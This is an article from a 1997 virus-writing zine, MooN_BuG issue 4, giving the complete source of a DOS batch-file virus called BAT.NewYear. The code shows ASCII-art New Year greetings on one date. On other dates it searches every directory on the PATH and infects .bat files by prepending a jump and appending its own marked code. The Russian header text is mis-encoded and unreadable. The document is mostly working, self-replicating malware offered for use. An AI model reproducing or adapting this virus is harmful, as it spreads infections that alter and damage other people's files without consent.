[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 4, Dec 1997                                           file 007

                              ‚¨àãá BAT.NewYear
                                                by FRiZER

[ BAT. NewYear ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ş „«¨­­      : 3333 ¡ ©â
ş †¥àâ¢ë     : *.bat
ş ƒ¤¥ ¨é¥â   : ¢ â¥ªãé¥¬ ¨ PATH
ş à®ï¢«¥­¨ï : ®§¤à ¢«ï¥â á H®¢ë¬ ƒ®¤®¬ 1 ï­¢ àï (å®âï ªâ® ¥£® ¨­â¥à¥á­®
³            : § ¯ãáâ¨â 1 ï­¢ àï ;)
ş  £¨       : ¥á«¨ ¡ â­¨ªã ¯¥à¥¤ îâáï ¯ à ¬¥âàë, â® ®­¨ § â¨à îâáï :(
[ Begin ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

@echo off %#%
goto #%1
:#
echo.|date|find "12.11.">#
if errorlevel 1 goto #infect
cls %#%
echo. %#%
echo  #°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°#
echo  #°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°°°ÛÛ°°ÛÛ°°°ÛÛÛÛ°°°ÛÛÛÛÛ°°°ÛÛ°°°°°°ÛÛ°°ÛÛ°°°ÛÛ°°°°°#
echo  #°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ°°°°°ÛÛ °ÛÛ °ÛÛ  ÛÛ°°ÛÛ  ÛÛ°°ÛÛ °°°°°ÛÛ °ÛÛÛ°ÛÛÛ °°°°#
echo  #°°°ÛÛÛÛ              ÛÛÛÛ°°°ÛÛÛÛÛÛ °ÛÛ °ÛÛ °ÛÛÛÛÛ  °ÛÛÛÛÛÛ°°ÛÛ °ÛÛ Û°ÛÛ °°°°#
echo  #°°°ÛÛÛÛ °°°°°°°°°°°°°ÛÛÛÛ °°ÛÛ  ÛÛ °ÛÛ °ÛÛ °ÛÛ  ÛÛ°°ÛÛ  ÛÛ °ÛÛ °ÛÛ ° ÛÛ °°°°#
echo  #°°°ÛÛÛÛ °°°°°°°°°°°°°°    °°ÛÛ °ÛÛ °°ÛÛÛÛ  °ÛÛÛÛÛ  °ÛÛÛÛÛÛ °ÛÛ °ÛÛ °°ÛÛ °°°°#
echo  #°°°ÛÛÛÛ °°°°°°°°°°°°°°°°°°°°°  °°  °°°    °°°     °°°      °°  °°  °°°  °°°°#
echo  #°°°ÛÛÛÛ °°°°°°°°°°°°°°°°°°°°ÛÛÛÛÛÛ°°°ÛÛÛÛ°°°ÛÛÛÛÛ°°°°ÛÛÛÛ°°°ÛÛ°°°ÛÛ°°ÛÛ°°°°°#
echo  #°°°ÛÛÛÛ °°°°°°°°°°°°°ÛÛÛÛ°°°ÛÛ     °ÛÛ  ÛÛ°°ÛÛ  ÛÛ°°ÛÛ  ÛÛ°°ÛÛÛ°ÛÛÛ °ÛÛ °°°°#
echo  #°°°ÛÛÛÛ °°°°°°°°°°°°°ÛÛÛÛ °°ÛÛ °°°°°ÛÛ °ÛÛ °ÛÛ °ÛÛ °ÛÛ °ÛÛ °ÛÛ Û°ÛÛ °ÛÛ °°°°#
echo  #°°°° ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ   °°ÛÛ °°°°°ÛÛ °ÛÛ °ÛÛ °ÛÛ °ÛÛ °ÛÛ °ÛÛ ° ÛÛ °°  °°°°#
echo  #°°°°°° ÛÛÛÛÛÛÛÛÛÛÛÛÛÛ   °°°°ÛÛ °°°°°°ÛÛÛÛ  °ÛÛÛÛÛ  °°ÛÛÛÛ  °ÛÛ °°ÛÛ °ÛÛ°°°°°#
echo  #°°°°°°°°              °°°°°°°  °°°°°°°    °°°     °°°°    °°°  °°°  °°  °°°°#
echo  #°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°#
echo  #°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°#
echo  #°°ÛÛÛÛÛÛ°°°ÛÛÛÛ°°°ÛÛÛÛÛ°°°°ÛÛÛÛ°°°ÛÛÛÛÛ°°°ÛÛ°°ÛÛ°°°ÛÛÛÛ°°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°°#
echo  #°°° ÛÛ   °ÛÛ  ÛÛ°°ÛÛ  ÛÛ°°ÛÛ  ÛÛ°°ÛÛ  ÛÛ°°ÛÛ ÛÛÛ °ÛÛ  ÛÛ°°ÛÛ °ÛÛ °ÛÛ ÛÛÛ °°°#
echo  #°°°°ÛÛ °°°ÛÛ °ÛÛ °ÛÛÛÛÛ  °ÛÛÛÛÛÛ °ÛÛÛÛÛ  °ÛÛÛÛÛÛ °ÛÛ °°  °°ÛÛÛÛÛ °ÛÛÛÛÛÛ °°°#
echo  #°°°°ÛÛ °°°ÛÛ °ÛÛ °ÛÛ  ÛÛ°°ÛÛ  ÛÛ °ÛÛ    °°ÛÛÛ ÛÛ °ÛÛ °ÛÛ°°°°  ÛÛ °ÛÛÛ ÛÛ °°°#
echo  #°°°°ÛÛ °°°°ÛÛÛÛ  °ÛÛÛÛÛ  °ÛÛ °ÛÛ °ÛÛ °°°°°ÛÛ  ÛÛ °°ÛÛÛÛ  °°°°°ÛÛ °ÛÛ  ÛÛ °°°#
echo  #°°°°°  °°°°°    °°°     °°°  °°  °°  °°°°°°  °°  °°°    °°°°°°°  °°  °°  °°°#
echo  #°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°#
pause>#
echo. %#%
echo ® á«ãç î ¯à §¤­¨ª  ­¨ç¥£® § à ¦ âì ­¥ ¡ã¤ã. %#%
echo. %#%
pause>#
echo ˆ«¨ ¯®§ à ¦ âì ¬ «¥­ìª® ;) %#%
echo. %#%
pause>#
echo ã ¥á«¨ âë â ª ¯à®á¨èì... %#%
echo. %#%
pause>#
echo ’ë â®ç­® íâ®£® å®ç¥èì? %#%
echo. %#%
pause>#
echo  §¬¥çâ «áï, ®¤­®£« §ë©! Ÿ á¥£®¤­ï ®â¤ëå î :) %#%
echo. %#%
pause>#
echo ‹ãçè¥ § ¯ãáâ¨ ¬¥­ï § ¢âà  :))) %#%
echo. %#%
pause>#
echo Bye. See you later. :)))%#%
echo                                                      „¥¤ Œ®à®§%#%
pause>#
pause>#
pause>#
echo.%#%
echo.%#%
echo I'll be back. %#%
echo. %#%
del #>nul
goto #end
:#infect
call %0 #3
for %%f in (%path%) do call %0 #3 %%f
type %#0%|find "#">#0
call %0 #1
for %%a in (%path%) do call %0 #1 %%a
type %#0%|find /V "#">#1.bat
type #1.bat|find /V "&">#2.bat
call #2.bat
del #*.*
set #0=
goto #end
:##1
if not exist %2\*.bat if not exist %2*.bat goto #end
if exist %2\*.bat set #1=%2\
if exist %2*.bat set #1=%2
for %%b in (%#1%*.bat) do call %0 #2 %%b
set #1=
goto #end
:##2
type %2|find "#">#
if not errorlevel 1 goto #end
echo @goto &&>#1
copy /b #1+%2>nul
echo.>>#1
echo :&&>>#1
copy /b #1+#0>nul
copy #1 %2>nul
goto #end
:##3
if exist %2\%0 set #0=%2\%0
if exist %2%0 set #0=%2%0
if exist %2\%0.bat set #0=%2\%0.bat
if exist %2%0.bat set #0=%2%0.bat
:#end
[ End ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
